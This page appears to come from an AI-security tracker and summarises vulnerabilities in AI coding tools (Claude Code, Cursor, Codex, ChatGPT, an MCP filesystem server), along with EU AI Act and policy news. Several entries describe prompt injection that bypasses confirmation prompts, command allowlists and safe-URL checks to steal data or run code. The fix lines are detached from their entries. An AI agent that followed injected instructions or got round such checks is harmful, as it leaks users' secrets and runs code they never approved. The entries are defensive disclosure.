All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Claude Code is an agentic coding tool (software that can automatically write and execute code). In versions before 1.0.20, a flaw in how the tool parses commands allows attackers to skip the confirmation prompt that normally protects users before running untrusted code. Exploiting this requires the attacker to insert malicious content into Claude Code's input.
Fix: This is fixed in version 1.0.20. Users should update Claude Code to version 1.0.20 or later.
NVD/CVE DatabaseClaude Code, an agentic coding tool (software that can write and modify code automatically), has a path validation flaw in versions before 0.2.111 that allows attackers to bypass directory restrictions and access files outside the intended working directory. The vulnerability exploits prefix matching (checking if one string starts with another) instead of properly comparing full file paths, and requires the attacker to create a directory with the same prefix name and inject untrusted content into the tool's context.
Cursor, a code editor designed for AI-assisted programming, has a vulnerability in versions below 1.3.9 where it can write files in a workspace without asking the user for permission. An attacker can exploit this by using prompt injection (tricking the AI by hiding instructions in its input) to create sensitive configuration files like .cursor/mcp.json, potentially gaining RCE (remote code execution, where an attacker can run commands on a system they don't own) on the victim's computer without approval.
Cursor, a code editor designed for AI-assisted programming, has a vulnerability in versions before 1.3.9 where it can write files to a workspace without asking the user for permission. An attacker can exploit this by using prompt injection (tricking the AI by hiding instructions in its input) combined with this flaw to modify editor configuration files and achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) without the user's knowledge.
Cursor IDE (an AI-powered code editor) has a vulnerability where it can render Mermaid diagrams (a tool for creating flowcharts and diagrams from simple text) that include external image requests without user confirmation. An attacker can use prompt injection (tricking the AI by hiding malicious instructions in code comments or other inputs) to embed image URLs in these diagrams, allowing them to steal sensitive data like API keys or user memories by encoding that information in the URL sent to an attacker-controlled server.
Anthropic's filesystem MCP server (a tool that lets AI assistants like Claude access your computer's files) had a path validation vulnerability where it only checked if a file path started with an allowed directory name, rather than confirming it was actually in that directory. This meant if you allowed access to /mnt/finance/data, the AI could also access sibling files like /mnt/finance/data-archived because the path string starts the same way.
1Panel is a web management tool that controls websites, files, containers (isolated software environments), databases, and AI models on Linux servers. In versions 2.0.5 and earlier, the tool's HTTPS connection (encrypted communication) between its core system and agent components doesn't fully verify certificates (digital identification documents), allowing attackers to gain unauthorized access and execute arbitrary commands on the server.
Cursor, a code editor that uses AI to help with programming, has a vulnerability in versions below 1.3 where Mermaid (a diagram rendering tool) can embed images that leak sensitive information to an attacker's server. An attacker could exploit this by using prompt injection (tricking the AI by hiding instructions in its input) through malicious data like websites, uploaded images, or source code, potentially stealing data when the images are fetched.
Cursor is a code editor designed for programming with AI that has a vulnerability in versions below 1.3. If a user changes Cursor's default settings to use an allowlist (a list of approved commands), an attacker can bypass this protection by using backticks (`) or $(cmd) syntax to run arbitrary commands (unrestricted code execution) without permission, especially when combined with indirect prompt injection (tricking the AI through hidden instructions in input).
CVE-2025-45150 is a vulnerability in LangChain-ChatGLM-Webui (a tool that combines language models with a web interface) caused by insecure permissions (CWE-732, which means access controls are set incorrectly on important resources). Attackers can exploit this flaw by sending specially crafted requests to view and download sensitive files they shouldn't be able to access.
The modelscope/ms-swift library up to version 2.6.1 has a critical vulnerability where it unsafely deserializes (reconstructs objects from saved data) untrusted files using pickle.load(), a Python function that can run arbitrary code during deserialization. Attackers can exploit this by tricking users into loading a malicious checkpoint file during model training, executing code on their machine while keeping the training process running normally so the user doesn't notice the attack.
A WordPress plugin called 'Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery' has a stored cross-site scripting vulnerability (XSS, a security flaw where attackers inject malicious code into a website that runs when others visit it) in its comment feature through version 26.1.0. Because the plugin doesn't properly clean and validate user input, unauthenticated attackers can inject harmful scripts that will execute for anyone viewing the affected pages.
On July 18, 2025, the European Commission released draft Guidelines that explain how the EU AI Act applies to General Purpose AI models (GPAI, which are flexible AI systems that can handle many different tasks). The Guidelines define GPAI models based on a compute threshold (10²³ FLOPs, or floating point operations, a measure combining model size and training data size), require providers to document their models and report serious incidents, and impose stricter obligations on very large models trained with 10²⁵ FLOPs or more. Providers of these large models must notify the Commission within two weeks and can request reassessment of their systemic risk classification if they provide evidence the model is not actually risky.
The Code of Practice is a framework that helps developers of General Purpose AI models (large AI systems designed for many different tasks) comply with EU AI Act requirements, though following it is voluntary. New GPAI models released after August 2, 2025 must comply immediately, while older models have until August 2, 2027, with enforcement actions delayed until August 2, 2026 to give developers time to adjust.
The dedupe Python library (which uses machine learning for fuzzy matching, deduplication, and entity resolution on structured data) had a critical vulnerability in its GitHub Actions workflow that allowed attackers to trigger code execution by commenting @benchmark on pull requests, potentially exposing the GITHUB_TOKEN (a credential that grants access to modify repository contents) and leading to repository takeover.
BentoML versions 1.4.0 to 1.4.19 have an SSRF vulnerability (server-side request forgery, where an attacker tricks a server into making requests to internal or restricted addresses) in their file upload feature. An unauthenticated attacker can exploit this to force the server to download files from any URL, including internal network addresses and cloud metadata endpoints (services that store sensitive information), without any validation.
Fix: Update Claude Code to version 0.2.111 or later, as this version contains the fix for the path validation flaw.
NVD/CVE DatabaseFix: Update Cursor to version 1.3.9 or later, where this vulnerability is fixed.
NVD/CVE DatabaseFix: Update Cursor to version 1.3.9 or later, where this vulnerability is fixed.
NVD/CVE DatabaseDifferential privacy (DP, a mathematical technique that adds controlled randomness to data to protect individual privacy while keeping data useful) is a widely-used method for protecting sensitive information, but putting it into practice in real-world systems has proven difficult. Researchers analyzed 21 actual deployments of differential privacy by major companies and institutions over the last ten years to understand what works and what doesn't.
Fix: Anthropic rewrote the filesystem server to support the roots feature of MCP, and this updated release fixed the vulnerability. The vulnerability is tracked as CVE-2025-53109.
Embrace The RedChatGPT Codex, a cloud-based AI tool that answers code questions and writes software, is vulnerable to prompt injection (tricking an AI by hiding instructions in its input) attacks that can turn it into a botnet (a network of compromised computers controlled remotely). An attacker can exploit the "Common Dependencies Allowlist" feature, which allows Codex internet access to certain approved servers, by hosting malicious code on Azure and injecting fake instructions into GitHub issues to hijack Codex and steal sensitive data or run malware.
Fix: Review the allowlist for the Dependency Set and apply a fine-grained approach. OpenAI recommends only using a self-defined allowlist when enabling Internet access, as Codex can be configured very granularly. Additionally, consider installing EDR (endpoint detection and response, security software that monitors suspicious activity) and other monitoring software on AI agents to track their behavior and detect if malware is installed.
Embrace The RedFix: Fixed in version 2.0.6. Users should update to this version or later.
NVD/CVE DatabaseFix: This issue is fixed in version 1.3. Users should update Cursor to version 1.3 or later.
NVD/CVE DatabaseFix: This is fixed in version 1.3.
NVD/CVE DatabaseA researcher discovered that ChatGPT's 'safe URL' feature, which is supposed to prevent data theft, can be bypassed using prompt injection (tricking an AI by hiding malicious instructions in its input). By exploiting this bypass, an attacker can trick ChatGPT into sending sensitive information like your chat history and memories to a server they control, especially if you ask ChatGPT to process untrusted content like PDFs or websites.
The Trump Administration released an AI Action Plan with policies across three areas: accelerating innovation, building infrastructure, and international leadership. While the plan primarily focuses on speeding up US AI development, it also includes several AI safety policies such as investing in AI interpretability (how AI systems make decisions), building evaluation systems to test AI safety, strengthening cybersecurity, and controlling exports of powerful AI chips.
Fix: This is fixed by commit 3f61e79.
NVD/CVE DatabaseFix: Upgrade to version 1.4.19 or later, which contains a patch for the issue.
NVD/CVE Database